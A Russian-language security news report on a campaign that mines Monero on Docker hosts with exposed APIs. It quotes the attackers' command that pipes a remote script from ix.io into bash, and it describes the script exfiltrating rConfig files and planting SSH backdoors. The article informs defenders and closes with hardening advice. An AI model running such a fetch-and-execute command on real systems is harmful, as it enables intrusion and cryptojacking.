Контакты
Подписка 2024
Персональные данные
4 апреля. Персональные данные в 2024 году: регулирование, практика, тенденции
Регистрируйтесь на онлайн-конференцию!

Преступники майнят Monero на уязвимых Docker-системах

26/11/19

Docker-2Некая киберпреступная группировка проводит массовое сканирование интернета на предмета Docker-систем с доступными в Сети API. Злоумышленники отправляют команды Docker-системам и размещают майнеры криптовалюты Monero. Вредоносная кампания началась 24 ноября и сразу же стала заметной из-за своего масштаба.

«Пользователи могут заметить, что подобные атаки на открытые Docker-системы не являются чем-то новым и происходят довольно часто. Отличительной чертой данной кампании был большой рост активности сканирования», — сообщил соучредитель компании Bad Packets Трой Марш (Troy Mursch).

По словам исследователей из Bad Packets, группа, осуществляющая данные атаки, в настоящее время сканирует более 59 тыс. IP-сетей (сетевых блоков) в поисках открытых Docker-систем. После обнаружения уязвимого хоста, злоумышленники используют API для запуска контейнера ОС Alpine Linux, где они запускают команду chroot/mnt/bin/sh -c'curl-sL4 http:// ix.io / 1XQa | bash. Она загружает и запускает скрипт Bash с сервера злоумышленников, который устанавливает классический майнер криптовалюты XMRRig. По словам Марша, за два дня с момента начала кампании преступники уже добыли 14,82 Monero (XMR) на общую сумму чуть более $740.

Эксперты также обнаружили, что преступники не только отключают защитные решения, но завершают все процессы, связанные с конкурирующими майнерами криптовалюты, такими как DDG. Как отмечается, вредоносный скрипт также содержит функцию сканирования зараженного хоста на наличие файлов rConfig. При обнаружении данные файлы шифруются и отправляются на C&C-сервер злоумышленников. Преступники также создают бэкдор на взломанных контейнерах и оставляют SSH-ключи для более легкого доступа и удаленного контроля зараженных хостов.

Эксперты рекомендуют пользователям Docker проверить, доступны ли в Сети их API, закрыть порты и удалить нераспознанные контейнеры.

Темы:майнингПреступленияDockerMonero
NGFW
9 апреля. Отечественные NGFW: как защитить облачную инфраструктуру и настроить обнаружение кибератак
Участвуйте и представляйте решения!

Хотите сотрудничать?

Выберите вариант!

Печатное издание
Интернет-портал
ВЫСТУПИТЬ НА КОНФЕРЕНЦИЯХ
СТАТЬ АВТОРОМ
SOAR, IRP, SOC
Спецпроекты журнала "Информационная безопасность"
Станьте автором издания!

Еще темы...

More...